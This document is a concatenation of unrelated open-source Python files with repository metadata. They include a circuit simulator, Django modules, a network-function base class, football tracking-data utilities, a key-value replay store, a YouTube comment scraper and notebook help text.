0166ddeeaf5e9d31d55bb080992bc0f5ec7e43ce
|
d219e3c9b4d72cf1fd6f0c61ca36093af0e9ad12
|
/attic/disimpy_libs.py
|
e7b89c5802190a365a97d582cc3d54211ecf8cc2
|
[] |
no_license
|
wovo/disimpy
|
747e2961c4b7b465c2d6fccd3b39f5ecaaee9f89
|
2134730a50fd838f8b29eb49031b58dd126081fd
|
refs/heads/master
| 2020-12-14T22:25:18.811424
| 2020-01-30T15:20:24
| 2020-01-30T15:20:24
| 234,891,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,347
|
py
|
"""disimpy: digital circuit simulator in Python
"""
import disimpy_base as base
import disimpy_gates as basic_gates
class nand( base.toolkit ):
"""a toolkit with only (unlimited number of inputs) nand gates
"""
def __init__( self, name = "toolkit nand" ):
super().__init__( name )
def f_nand( self, *inputs ):
self.add( "gate" )
self.add( "nand" )
self.add( "input", len( inputs ) )
return basic_gates.g_nand( inputs )
class nand2( base.toolkit ):
"""a toolkit with only 2-input nand gates
"""
def __init__( self, name = "toolkit nand2" ):
super().__init__( name )
def f_nand( self, a, b ):
self.add( "gate" )
self.add( "nand2" )
self.add( "inputs", 2 )
return basic_gates.g_nand( [ a, b ] )
class gates( base.toolkit ):
"""a toolkit with the class gates
"""
def __init__( self, name = "toolkit gates" ):
super().__init__( name )
def _make( self, name, inputs, basic ):
self.add( "gate" )
self.add( name )
self.add( "input", len( inputs ) )
return basic( inputs )
def f_not( self, *inputs ):
return self._make( "not", inputs, basic_gates.g_not )
def f_nand( self, *inputs ):
return self._make( "nand", inputs, basic_gates.g_nand )
def f_and( self, *inputs ):
return self._make( "and", inputs, basic_gates.g_and )
def f_nor( self, *inputs ):
return self._make( "nor", inputs, basic_gates.g_nor )
def f_or( self, *inputs ):
return self._make( "and", inputs, basic_gates.g_or )
def f_xnor( self, *inputs ):
return self._make( "xnor", inputs, basic_gates.g_xnor )
def f_xor( self, *inputs ):
return self._make( "xor", inputs, basic_gates.g_xor )
class gates_from( base.toolkit ):
"""a toolkit with the class gates
"""
def __init__( self, base = None, name = "" ):
self.base = base
if name == "":
name = "add gates to %s " % base.name
super().__init__( name )
def f_nand( self, *inputs ):
self.add( "gate" )
self.add( "nand" )
self.add( "input", len( inputs ) )
return basic_gates.g_nand( inputs )
def __getattr__( self, item ):
return getattr( self.base, item )
|
[
"wouter@voti.nl"
] |
wouter@voti.nl
|
05fae65f1269c0c0152dae6c1cad650454a36a28
|
11eb58ac440c8e3cd437002632c1dd488220a81f
|
/newproject/urls.py
|
2866541b4681d7898c7446f30233b7401d609a3d
|
[] |
no_license
|
rbartosinski/djangogirls_test
|
39a6f06be767ea106e11bef515ab954eb23bd06a
|
36439d6c67903cdfe6c986194cb5de22f2d4bc2b
|
refs/heads/master
| 2020-04-16T14:39:31.927699
| 2019-01-20T18:29:49
| 2019-01-20T18:29:49
| 165,675,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 797
|
py
|
"""newproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
]
|
[
"rbartosinski@wp.pl"
] |
rbartosinski@wp.pl
|
33dc1b6019a3d71fc08f47f08016af65d512aae8
|
63aef4f6b9a6e5f20e2832d2ed40c6178a219426
|
/api/product/resources.py
|
fcc912656f8c91c5c78bef4ac7de8f4c7442f4fd
|
[] |
no_license
|
longdt19/vngonow-api
|
7b98efd4fa9aca15ff554c81949222fc678d0933
|
c6a1a3d2b02a3847e469910b4b2e66df619baf51
|
refs/heads/master
| 2020-04-15T06:35:19.652708
| 2019-01-07T17:15:37
| 2019-01-07T17:15:37
| 164,465,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
from api.common.base_resources import BaseResource
from .forms import *
from .business_logics import sim_bl
class SimResource(BaseResource):
GET_INPUT_SCHEMA = GetSimDetailForm()
POST_INPUT_SCHEMA = CreateSimForm()
def get(self):
params = self.parse_request_params()
return sim_bl.get_one(**params)
def post(self):
params = self.parse_request_params()
return sim_bl.create(**params)
RESOURCES = {
'/sim': {
'resource': SimResource
}
}
|
[
"longdt.19@gmail.com"
] |
longdt.19@gmail.com
|
60bf16f87f5ad4e17e37db5a8f55c69a8ae134a2
|
0a66006ce524377c7f2d6986910a60a11028c62d
|
/yardstick/network_services/vnf_generic/vnf/base.py
|
1d770f724e4522392b04eff71fd5fb8ac1779147
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
alexnemes/yardstick
|
6c472ec1b070e4d4f4217d4d00c96c7b8b5a7c49
|
7a89a01cdb1b3569d0b67451572edbae0f3d05aa
|
refs/heads/master
| 2021-01-20T17:12:45.010147
| 2017-06-20T09:59:31
| 2017-06-20T09:59:31
| 94,768,728
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,743
|
py
|
# Copyright (c) 2016-2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Base class implementation for generic vnf implementation """
from __future__ import absolute_import
import logging
import ipaddress
import six
from yardstick.network_services.utils import get_nsb_option
LOG = logging.getLogger(__name__)
class QueueFileWrapper(object):
""" Class providing file-like API for talking with SSH connection """
def __init__(self, q_in, q_out, prompt):
self.q_in = q_in
self.q_out = q_out
self.closed = False
self.buf = []
self.bufsize = 20
self.prompt = prompt
def read(self, size):
""" read chunk from input queue """
if self.q_in.qsize() > 0 and size:
in_data = self.q_in.get()
return in_data
def write(self, chunk):
""" write chunk to output queue """
self.buf.append(chunk)
# flush on prompt or if we exceed bufsize
size = sum(len(c) for c in self.buf)
if self.prompt in chunk or size > self.bufsize:
out = ''.join(self.buf)
self.buf = []
self.q_out.put(out)
def close(self):
""" close multiprocessing queue """
pass
def clear(self):
""" clear queue """
while self.q_out.qsize() > 0:
self.q_out.get()
class GenericVNF(object):
""" Class providing file-like API for generic VNF implementation """
def __init__(self, vnfd):
super(GenericVNF, self).__init__()
self.vnfd = vnfd # fixme: parse this into a structure
# List of statistics we can obtain from this VNF
# - ETSI MANO 6.3.1.1 monitoring_parameter
self.kpi = self._get_kpi_definition(vnfd)
# Standard dictionary containing params like thread no, buffer size etc
self.config = {}
self.runs_traffic = False
self.name = "vnf__1" # name in topology file
self.bin_path = get_nsb_option("bin_path", "")
@classmethod
def _get_kpi_definition(cls, vnfd):
""" Get list of KPIs defined in VNFD
:param vnfd:
:return: list of KPIs, e.g. ['throughput', 'latency']
"""
return vnfd['benchmark']['kpi']
@classmethod
def get_ip_version(cls, ip_addr):
""" get ip address version v6 or v4 """
try:
address = ipaddress.ip_address(six.text_type(ip_addr))
except ValueError:
LOG.error(ip_addr, " is not valid")
return
else:
return address.version
def _ip_to_hex(self, ip_addr):
ip_to_convert = ip_addr.split(".")
ip_x = ip_addr
if self.get_ip_version(ip_addr) == 4:
ip_to_convert = ip_addr.split(".")
ip_octect = [int(octect) for octect in ip_to_convert]
ip_x = "{0[0]:02X}{0[1]:02X}{0[2]:02X}{0[3]:02X}".format(ip_octect)
return ip_x
def _get_dpdk_port_num(self, name):
for intf in self.vnfd['vdu'][0]['external-interface']:
if name == intf['name']:
return intf['virtual-interface']['dpdk_port_num']
def _append_routes(self, ip_pipeline_cfg):
if 'routing_table' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['routing_table']
where = ip_pipeline_cfg.find("arp_route_tbl")
link = ip_pipeline_cfg[:where]
route_add = ip_pipeline_cfg[where:]
tmp = route_add.find('\n')
route_add = route_add[tmp:]
cmds = "arp_route_tbl ="
for route in routing_table:
net = self._ip_to_hex(route['network'])
net_nm = self._ip_to_hex(route['netmask'])
net_gw = self._ip_to_hex(route['gateway'])
port = self._get_dpdk_port_num(route['if'])
cmd = \
" ({port0_local_ip_hex},{port0_netmask_hex},{dpdk_port},"\
"{port1_local_ip_hex})".format(port0_local_ip_hex=net,
port0_netmask_hex=net_nm,
dpdk_port=port,
port1_local_ip_hex=net_gw)
cmds += cmd
cmds += '\n'
ip_pipeline_cfg = link + cmds + route_add
return ip_pipeline_cfg
def _append_nd_routes(self, ip_pipeline_cfg):
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
where = ip_pipeline_cfg.find("nd_route_tbl")
link = ip_pipeline_cfg[:where]
route_nd = ip_pipeline_cfg[where:]
tmp = route_nd.find('\n')
route_nd = route_nd[tmp:]
cmds = "nd_route_tbl ="
for route in routing_table:
net = route['network']
net_nm = route['netmask']
net_gw = route['gateway']
port = self._get_dpdk_port_num(route['if'])
cmd = \
" ({port0_local_ip_hex},{port0_netmask_hex},{dpdk_port},"\
"{port1_local_ip_hex})".format(port0_local_ip_hex=net,
port0_netmask_hex=net_nm,
dpdk_port=port,
port1_local_ip_hex=net_gw)
cmds += cmd
cmds += '\n'
ip_pipeline_cfg = link + cmds + route_nd
return ip_pipeline_cfg
def _get_port0localip6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 1:
return_value = route['network']
LOG.info("_get_port0localip6 : %s", return_value)
return return_value
def _get_port1localip6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 2:
return_value = route['network']
LOG.info("_get_port1localip6 : %s", return_value)
return return_value
def _get_port0prefixlen6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 1:
return_value = route['netmask']
LOG.info("_get_port0prefixlen6 : %s", return_value)
return return_value
def _get_port1prefixlen6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 2:
return_value = route['netmask']
LOG.info("_get_port1prefixlen6 : %s", return_value)
return return_value
def _get_port0gateway6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 1:
return_value = route['network']
LOG.info("_get_port0gateway6 : %s", return_value)
return return_value
def _get_port1gateway6(self):
return_value = ""
if 'nd_route_tbl' in self.vnfd['vdu'][0]:
routing_table = self.vnfd['vdu'][0]['nd_route_tbl']
inc = 0
for route in routing_table:
inc += 1
if inc == 2:
return_value = route['network']
LOG.info("_get_port1gateway6 : %s", return_value)
return return_value
def instantiate(self, scenario_cfg, context_cfg):
""" Prepare VNF for operation and start the VNF process/VM
:param scenario_cfg:
:param context_cfg:
:return: True/False
"""
raise NotImplementedError()
def terminate(self):
""" Kill all VNF processes
:return:
"""
raise NotImplementedError()
def scale(self, flavor=""):
"""
:param flavor:
:return:
"""
raise NotImplementedError()
def collect_kpi(self):
"""This method should return a dictionary containing the
selected KPI at a given point of time.
:return: {"kpi": value, "kpi2": value}
"""
raise NotImplementedError()
class GenericTrafficGen(GenericVNF):
""" Class providing file-like API for generic traffic generator """
def __init__(self, vnfd):
super(GenericTrafficGen, self).__init__(vnfd)
self.runs_traffic = True
self.traffic_finished = False
self.name = "tgen__1" # name in topology file
def run_traffic(self, traffic_profile):
""" Generate traffic on the wire according to the given params.
Method is non-blocking, returns immediately when traffic process
is running. Mandatory.
:param traffic_profile:
:return: True/False
"""
raise NotImplementedError()
def listen_traffic(self, traffic_profile):
""" Listen to traffic with the given parameters.
Method is non-blocking, returns immediately when traffic process
is running. Optional.
:param traffic_profile:
:return: True/False
"""
pass
def verify_traffic(self, traffic_profile):
""" Verify captured traffic after it has ended. Optional.
:param traffic_profile:
:return: dict
"""
pass
def terminate(self):
""" After this method finishes, all traffic processes should stop. Mandatory.
:return: True/False
"""
raise NotImplementedError()
|
[
"deepak.s@linux.intel.com"
] |
deepak.s@linux.intel.com
|
89cced5029171d8eeac66cd9c271abdabafc816b
|
6ce6459f7992f6f884611cc20b94d55e498cb799
|
/실습 코드/파이썬을 파이썬 답게/Welcome.py
|
9ed199dee1d3821f4c700026b59d4f395f580908
|
[] |
no_license
|
Donghyun-34/Python
|
a05b3dc0feba18839bab074643da75f7bdb1f3fe
|
0a1629113fe0cddc5def574b1ec0b11c41cbd20d
|
refs/heads/main
| 2023-07-15T12:38:22.346432
| 2021-08-30T07:42:10
| 2021-08-30T07:42:10
| 393,931,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
def solution(mylist):
"""
Version C
answer = []
for i in mylist:
answer.append(len(i))
return answer
"""
# Version Python
return list(map(len, mylist))
# map : 첫번째 인자로 주어진 함수에 두 번째 인자로 주어진 값을 반복적으로 대입해서 결과값 반환
print(solution([[1, 3, 4, 5], [1, 2]]))
|
[
"akakak413@naver.com"
] |
akakak413@naver.com
|
9690f03824a072205a0b0ef9394926d834113ef9
|
342af5b642839c4fd9f833ec93f4b65f3af2296c
|
/pocs/test/example.py
|
1cab5c5e3c4f2a4ab8d0a6b44ee133a86aa21f5c
|
[] |
no_license
|
anwilx/POC-S
|
4cf2a1e8e7e3eef6444cc0f9ff827afc9a5d8dd6
|
eb06d3f54b1698362ad0b62f1b26d22ecafa5624
|
refs/heads/master
| 2022-04-08T16:37:26.838436
| 2020-03-12T02:48:12
| 2020-03-12T02:48:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import unittest
class MyTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print "setUpClass"
def test_example(self):
self.assertTrue(1==1)
@classmethod
def tearDownClass(cls):
print "running teardown"
def test_single():
suite = unittest.TestSuite()
suite.addTest(MyTest('test_example'))
unittest.TextTestRunner(verbosity=2).run(suite)
if __name__ == "__main__":
unittest.main()
|
[
"2461805286@qq.com"
] |
2461805286@qq.com
|
b7598b85a18e5062a036788b0b02b5f3f71c8645
|
270d27a79aeace2e5e0d8b33e79b533679558b5f
|
/storage/objects/nucleus.py
|
01d46be2c55c33c24ad5dc2d44d9b99dd1ada304
|
[] |
no_license
|
baemms/NucleoSegment
|
dedc1237d9dccb449292de3e32c723b64da4b857
|
e644b3a3dc284cd430c25ea48e9af664c86034cf
|
refs/heads/master
| 2020-06-20T19:39:55.024310
| 2017-08-01T13:55:17
| 2017-08-01T13:55:17
| 74,744,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 156
|
py
|
"""
Store all information regarding individually merged nuclei
"""
class Nucleus:
volume = None
planes = None
coords = None
areas = None
|
[
"dominik@schienstock.de"
] |
dominik@schienstock.de
|
785aff74b90e752d87ebe0e8f429ca461407deb0
|
bcdcf2e9e014568c8cb7180f43be2d409218dda5
|
/src/pitchly/utils.py
|
64299bd401005bd94bf2ea57b52ecc00c5c4724c
|
[
"MIT"
] |
permissive
|
opunsoars/pitchly
|
822d2763a4c528c0806fe7d84ee3b2f50433ea3d
|
ad3bba4ab7ce1f2dc5cb6d184aac14a487d20056
|
refs/heads/master
| 2023-07-07T10:54:30.861043
| 2021-08-11T17:00:09
| 2021-08-11T17:00:09
| 358,345,099
| 10
| 2
|
MIT
| 2021-08-11T13:45:40
| 2021-04-15T17:46:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,659
|
py
|
import glob
import numpy as np
import pandas as pd
import scipy.signal as signal
from .params import prm
match_dir = "/media/opunsoars/My Book/playground/friends_of_tracking/friends_of_tracking/\
datahub/metrica_sports/sample-data/data/Sample_Game_1"
def modify_cols(tracking_df):
cols = list(tracking_df.iloc[2, :3])
# cols = cols[:3]
for i in range(3, tracking_df.shape[1] - 2, 2):
cols.append(f"{tracking_df.iloc[0,i]}_{tracking_df.iloc[1,i]}_X")
cols.append(f"{tracking_df.iloc[0,i]}_{tracking_df.iloc[1,i]}_Y")
cols.append("ball_X")
cols.append("ball_Y")
tracking_df.columns = cols
tracking_df = tracking_df.loc[3:, :]
for col in cols[2:]:
tracking_df[col] = tracking_df[col].astype(float)
tracking_df["Frame"] = tracking_df.Frame.astype(int)
tracking_df["Period"] = tracking_df.Period.astype(int)
tracking_df["mins"] = tracking_df["Time [s]"].apply(
lambda x: f"{x//60:0.0f}:{x%60:0.2f}"
)
tracking_df.set_index("Frame", inplace=True)
return tracking_df
def convert_to_metric_coords(data, field_dimen=prm.field_dim):
"""
Convert positions from Metrica units to meters (with origin at centre circle)
"""
x_columns = [c for c in data.columns if c.endswith("X")]
y_columns = [c for c in data.columns if c.endswith("Y")]
data[x_columns] = (data[x_columns] - 0.5) * field_dimen[0]
data[y_columns] = -1 * (data[y_columns] - 0.5) * field_dimen[1]
"""
------------ ***NOTE*** ------------
Metrica actually define the origin at the *top*-left of the field, not the bottom-left, as discussed in the YouTube video.
I've changed the line above to reflect this. It was originally:
data[y_columns] = ( data[y_columns]-0.5 ) * field_dimen[1]
------------ ********** ------------
"""
return data
def calc_player_velocities(
team,
smoothing=True,
filter_="moving average",
window=7,
polyorder=1,
maxspeed=12,
):
"""calc_player_velocities( tracking_data )
Calculate player velocities in x & y direciton, and total player speed at each timestamp of the tracking data
Parameters
-----------
team: the tracking DataFrame for home or away team
smoothing: boolean variable that determines whether velocity measures are smoothed. Default is True.
filter: type of filter to use when smoothing the velocities. Default is Savitzky-Golay,\
which fits a polynomial of order 'polyorder' to the data within each window
window: smoothing window size in # of frames
polyorder: order of the polynomial for the Savitzky-Golay filter. \
Default is 1 - a linear fit to the velcoity, so gradient is the acceleration
maxspeed: the maximum speed that a player can realisitically achieve (in meters/second). \
d measures that exceed maxspeed are tagged as outliers and set to NaN.
Returrns
-----------
team : the tracking DataFrame with columns for speed in the x & y direction and total speed added
"""
# remove any velocity data already in the dataframe
team = remove_player_velocities(team)
# print (team.isna().sum())
# Get the player ids
player_ids = np.unique(
[c[:-2] for c in team.columns if c[:4] in ["Home", "Away"]]
)
# Calculate the timestep from one frame to the next. Should always be 0.04 within the same half
dt = team["Time [s]"].diff()
# index of first frame in second half
second_half_idx = team.Period.idxmax(2)
# estimate velocities for players in team
for player in player_ids: # cycle through players individually
# difference player positions in timestep dt to get unsmoothed estimate of velicity
vx = team[player + "_X"].diff() / dt
vy = team[player + "_Y"].diff() / dt
if maxspeed > 0:
# remove unsmoothed data points that exceed the maximum speed (these are most likely position errors)
raw_speed = np.sqrt(vx ** 2 + vy ** 2)
vx[raw_speed > maxspeed] = np.nan
vy[raw_speed > maxspeed] = np.nan
if smoothing:
if filter_ == "Savitzky-Golay":
# calculate first half velocity
vx.iloc[:second_half_idx] = signal.savgol_filter(
vx.iloc[:second_half_idx],
window_length=window,
polyorder=polyorder,
)
vy.iloc[:second_half_idx] = signal.savgol_filter(
vy.iloc[:second_half_idx],
window_length=window,
polyorder=polyorder,
)
# calculate second half velocity
vx.iloc[second_half_idx:] = signal.savgol_filter(
vx.iloc[second_half_idx:],
window_length=window,
polyorder=polyorder,
)
vy.iloc[second_half_idx:] = signal.savgol_filter(
vy.iloc[second_half_idx:],
window_length=window,
polyorder=polyorder,
)
elif filter_ == "moving average":
ma_window = np.ones(window) / window
# calculate first half velocity
vx.iloc[:second_half_idx] = np.convolve(
vx.iloc[:second_half_idx], ma_window, mode="same"
)
vy.iloc[:second_half_idx] = np.convolve(
vy.iloc[:second_half_idx], ma_window, mode="same"
)
# calculate second half velocity
vx.iloc[second_half_idx:] = np.convolve(
vx.iloc[second_half_idx:], ma_window, mode="same"
)
vy.iloc[second_half_idx:] = np.convolve(
vy.iloc[second_half_idx:], ma_window, mode="same"
)
# put player speed in x,y direction, and total speed back in the data frame
team[player + "_vx"] = vx
team[player + "_vy"] = vy
team[player + "_speed"] = np.sqrt(vx ** 2 + vy ** 2)
return team
def remove_player_velocities(team):
# remove player velocoties and acceleeration measures that are already in the 'team' dataframe
columns = [
c
for c in team.columns
if c.split("_")[-1] in ["vx", "vy", "ax", "ay", "speed", "acceleration"]
] # Get the player ids
team = team.drop(columns=columns)
return team
def flip_second_half_direction(team):
"""
Flip coordinates in second half so that each team always shoots in the same direction through the match.
"""
second_half_idx = team.Period.idxmax(2)
columns = [c for c in team.columns if c[-1].lower() in ["x", "y"]]
team.loc[second_half_idx:, columns] *= -1
return team
def load_data(match_dir):
home_track = (
pd.read_csv(glob.glob(f"{match_dir}/*Home*.csv")[0], header=None)
.pipe(modify_cols)
.pipe(convert_to_metric_coords)
.pipe(calc_player_velocities)
.pipe(flip_second_half_direction)
)
away_track = (
pd.read_csv(glob.glob(f"{match_dir}/*Away*.csv")[0], header=None)
.pipe(modify_cols)
.pipe(convert_to_metric_coords)
.pipe(calc_player_velocities)
.pipe(flip_second_half_direction)
)
events = (
pd.read_csv(glob.glob(f"{match_dir}/*Events*.csv")[0])
.pipe(convert_to_metric_coords)
.pipe(flip_second_half_direction)
)
return home_track, away_track, events
# tracking_home, tracking_away, events = load_data(match_dir)
|
[
"vinay.warrier@gmail.com"
] |
vinay.warrier@gmail.com
|
519f704a27b31e3a77185effc036ed4eedd92cdd
|
73fb3e773d5f884197882a94036bb1b52f232029
|
/legacy/replay_db.py
|
b5ff023ca178484c834c82f57be4850fbe081a14
|
[] |
no_license
|
Steve132/bard
|
32bc7fe02876b8a9824d12de4b24a6f488e44c7a
|
410e4a9653b15e8390f581f2540be6823bd96417
|
refs/heads/master
| 2020-05-30T22:43:47.974876
| 2019-11-21T01:27:45
| 2019-11-21T01:27:45
| 21,441,196
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,631
|
py
|
import sys
import base64
import json
import urllib
from collections import MutableMapping
class ReplayDB(MutableMapping):
def _decode(self,c):
s=urllib.unquote(c)
#s=base64.standard_b64decode(s)
return json.loads(s)
def _encode(self,o):
s=json.dumps(o)
c=urllib.quote(s)
#c=base64.standard_b64encode(s)
return c
def _writeset(self,key,value):
self.replayfileobj.write("s %s %s\n" % (self._encode(key),self._encode(value)))
def _writedel(self,key):
self.replayfileobj.write("d %s NONE\n" % (self._encode(key)))
def __init__(self,replayfile):
self.rdb={}
try:
with open(replayfile,'r') as trpfob:
for entry in trpfob:
try:
op,ke,ve=entry.split()
k=self._decode(ke)
v=self._decode(ve)
k=tuple(k)
if(op=='d'):
del self.rdb[k]
elif(op=='s'):
self.rdb[k]=v
except Exception as e1:
print("error unpacking in %s:%r. (%r,%r)" % (replayfile,e1,ke,ve))
except Exception as e:
print("couldn't open %s:%r" % (replayfile,e))
self.replayfileobj=open(replayfile,'w+')
for k,v in self.rdb.items():
#print("WRITEBACK "+str(k)+':'+str(v))
self._writeset(k,v)
def __getitem__(self,key):
return self.rdb[key]
def __setitem__(self,key,value):
ov=self.rdb.get(key,None)
if(not (ov == value)):
self._writeset(key,value)
self.rdb[key]=value
def __delitem__(self,key):
self._writedel(key)
del self.rdb[key]
def __contains__(self,key):
return key in self.rdb
def keys(self):
return self.rdb.keys()
def __iter__(self):
return self.rdb.__iter__()
def __len__(self):
return len(self.rdb)
|
[
"steve@soapforge.com"
] |
steve@soapforge.com
|
a5330d19026db986f20c8b01217e15b07e32f511
|
4066083132057c6948dadfa534412454becd25b3
|
/students/form.py
|
22acd047397420e6d4849556174764753944456d
|
[] |
no_license
|
lanchaoxiang/django-
|
22d82721caeec9fbd02520c417dd3a4c1668704d
|
db7144451e6ba9fdef5c3d16e912617591c43ba6
|
refs/heads/master
| 2022-06-17T19:57:11.513424
| 2020-05-15T07:21:42
| 2020-05-15T07:21:42
| 264,125,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
from django import forms
from .models import Students
class StudentsForm(forms.ModelForm):
def clean_phone(self):
cleaned_data = self.cleaned_data['phone']
if not cleaned_data.isdigit():
raise forms.ValidationError("必须是数字")
return int(cleaned_data)
class Meta:
model = Students
fields =('name','sex','profession','phone','email')
|
[
"982252331.com"
] |
982252331.com
|
d584ad747c5fa2dd62dabd8f0807dcc050ba430c
|
f397eb9e1c05ab26d412d95569986b1b73ed2eb5
|
/Python/youtube_services.py
|
f49e61cd332ac625ce170fcbe77ebbbe5526d153
|
[] |
no_license
|
Bror-E/Eurovision-Youtube-Comments
|
b6539d2646c30b6a9f395d301e3d25b1e5558486
|
2441b50e036e86c5bc28a00e12174f349e48a644
|
refs/heads/main
| 2023-05-02T06:15:14.995229
| 2021-05-24T11:45:10
| 2021-05-24T11:45:10
| 368,993,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,167
|
py
|
import requests
import json
from csv import writer
from googleapiclient.discovery import build
from urllib.parse import urlparse, parse_qs
import os
import codecs
test_url = "https://www.youtube.com/watch?v=i6r3MMMAo3Q"
API_KEY_FILENAME = "youtubeDataV3.txt"
def get_api_key(filename):
with open(filename) as f:
key = f.readline()
return key
def build_youtube_data_v3_service(apiKeyFilename):
key = get_api_key(apiKeyFilename)
return build("youtube", "v3", developerKey=key)
def get_video_id_from_url(url):
u_pars = urlparse(url)
quer_v = parse_qs(u_pars.query).get("v")
if quer_v:
return quer_v[0]
pth = u_pars.path.split("/")
if pth:
return pth[-1]
def get_comments(part="snippet",
maxResults=100,
textFormat="plainText",
order="time",
videoId='',
csv_filename="empty",
csv_path=''):
comments = []
service = build_youtube_data_v3_service(API_KEY_FILENAME)
response = service.commentThreads().list(
part=part,
maxResults=maxResults,
textFormat=textFormat,
order=order,
videoId=videoId
).execute()
counter = 0
while response: # this loop will continue to run until you max out your quota
print(f'Getting comments {counter} -> {counter+maxResults}')
for item in response["items"]:
comment = item["snippet"]["topLevelComment"]["snippet"]["textDisplay"].rstrip(
'\n')
comments.append(comment)
with codecs.open(os.path.join(csv_path, csv_filename), "a+", encoding="utf-16") as f:
csv_writer = writer(f)
csv_writer.writerow([comment])
if "nextPageToken" in response:
response = service.commentThreads().list(
part=part,
maxResults=maxResults,
textFormat=textFormat,
order=order,
videoId=videoId,
pageToken=response["nextPageToken"]
).execute()
else:
break
counter += maxResults
|
[
"bror_ebk@hotmail.com"
] |
bror_ebk@hotmail.com
|
e2d72a4b50f635ef0ad2b739407c127437f87cc8
|
926ffe00858129292bcb90a5d4257ce65ba843a0
|
/src/ipycbm/plugins/foi/foi_help.py
|
f00f66813b04f934b6b0813a40351b94837d4d46
|
[
"BSD-3-Clause"
] |
permissive
|
VP-GEO/cbm
|
c07386b1204b0cd2a92b06abb4b9c2dc10057790
|
4ed229f6b6455435b6d032deb8a39dba4ecee7a2
|
refs/heads/main
| 2023-02-25T19:33:34.147762
| 2021-01-27T13:43:11
| 2021-01-27T13:43:11
| 331,580,086
| 0
| 0
|
BSD-3-Clause
| 2021-01-21T09:37:53
| 2021-01-21T09:37:52
| null |
UTF-8
|
Python
| false
| false
| 10,830
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of CbM (https://github.com/ec-jrc/cbm).
# Author : Gilbert Voican, Konstantinos Anastasakis
# Credits : GTCAP Team
# Copyright : 2021 European Commission, Joint Research Centre
# License : 3-Clause BSD
from ipywidgets import (HTML, HBox, VBox, Checkbox, Layout, widgets)
def widget_box():
wbox = VBox(children=[ipycbm_help(), about()])
return wbox
def ipycbm_help():
html = """
<H2>'Get' and 'View' functions.</H2>
With the 'get' function you can download data from the server to your local jupyter environment.<br>
The 'view' function is to load local files and display them with different methods, or provide example code for each selected dataset.<br>
<H4>Available options:</H4>
<b>Get data example:</b><br>
<code>import src.ipycbm</code><br>
<code>ipycbm.get()</code>
<br>
<b>View data example:</b><br>
<code>import src.ipycbm</code><br>
<code>ipycbm.view()</code><br>
<br>
'**tmp**' folder structure example for parcel with ID 12345:<br>
<code>tmp/
cat2019/parcel_12345/12345_information.json
cat2019/parcel_12345/12345_time_series.csv
cat2019/parcel_12345/12345_chipimages/12345_images_list.csv
cat2019/parcel_12345/12345_chipimages/S2A_MSIL2A_2019---.B04.tif
cat2019/parcel_12345/12345_chipimages/...</code>
"""
wbox = widgets.HTML(
value=html,
placeholder="Documantation",
description="")
return wbox
def about():
from src import __version__
html = f"""
<H1>About</H1>
<H3>JRC D5 Food security - GTCAP</H3>
<H4>DIAS for CAP Checks by Monitoring, development platforms and services.</H4>
Authors:<br>
Guido Lemoine<br>
Konstantinos Anastasakis<br>
<br>
Copyright 2021, Joint Research Centre (JRC) European Commission<br>
License: 3-Clause BSD , Version: {__version__}
"""
wbox = HTML(
value=html,
placeholder='About',
description='',
)
return wbox
def widget_box_foi():
wbox = VBox(children=[ipycbm_help_foi(), about()])
return wbox
def ipycbm_help_foi():
html = """
<H2>FOI Assessment: Heterogeneity and Cardinality</H2>
